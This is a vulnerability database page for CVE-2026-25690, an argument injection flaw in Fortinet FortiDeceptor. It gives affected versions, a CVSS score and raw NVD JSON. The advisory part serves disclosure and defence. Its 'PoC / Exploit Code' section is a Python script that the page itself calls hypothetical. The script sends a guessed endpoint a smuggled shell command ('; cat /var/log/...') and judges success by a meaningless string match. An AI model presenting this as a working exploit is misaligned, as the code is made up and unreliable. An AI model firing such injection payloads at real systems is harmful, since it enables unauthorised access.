CVE-2026-25690

Description

An improper neutralization of argument delimiters in a command ('argument injection') vulnerability in Fortinet FortiDeceptor 6.0.0 through 6.0.2, FortiDeceptor 5.3.0 through 5.3.3, FortiDeceptor 5.2.0 through 5.2.1, FortiDeceptor 5.1 all versions, FortiDeceptor 5.0 all versions may allow an authenticated attacker with at least read-only admin permission to read log files via HTTP crafted requests.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

FortiDeceptor 6.0.0 - 6.0.2

FortiDeceptor 5.3.0 - 5.3.3

FortiDeceptor 5.2.0 - 5.2.1

FortiDeceptor 5.1 全部版本

FortiDeceptor 5.0 全部版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Hypothetical endpoint based on vulnerability description)
target_url = "https://<target-ip>/api/logs"

# Attacker's credentials (Read-only admin)
username = "admin"
password = "password"

# Malicious payload to inject arguments for reading log files
# Example: injecting a file path argument via a vulnerable parameter
payload = {
    "action": "view",
    "file": "/var/log/fortideceptor/system.log", # Attempting to read specific log
    # Injection vector might look like appending delimiter and file path
    "vulnerable_param": "normal_value; cat /var/log/fortideceptor/system.log"
}

try:
    # Sending the crafted HTTP request
    response = requests.post(target_url, auth=(username, password), data=payload, verify=False)
    
    # Check if the response contains the log data
    if response.status_code == 200 and "log content" in response.text:
        print("[+] Exploit successful! Log data leaked.")
        print(response.text)
    else:
        print("[-] Exploit failed or target not vulnerable.")
        print(response.status_code)
        
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-25690
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-25690
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-25690/
[4] VulDB https://vuldb.com/cve/CVE-2026-25690
[5] https://fortiguard.fortinet.com/psirt/FG-IR-26-138

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-25690", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:39.540", "lastModified": "2026-05-12T18:57:02.307", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of argument delimiters in a command ('argument injection') vulnerability in Fortinet FortiDeceptor 6.0.0 through 6.0.2, FortiDeceptor 5.3.0 through 5.3.3, FortiDeceptor 5.2.0 through 5.2.1, FortiDeceptor 5.1 all versions, FortiDeceptor 5.0 all versions may allow an authenticated attacker with at least read-only admin permission to read log files via HTTP crafted requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-88"}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-138", "source": "[email protected]"}]}}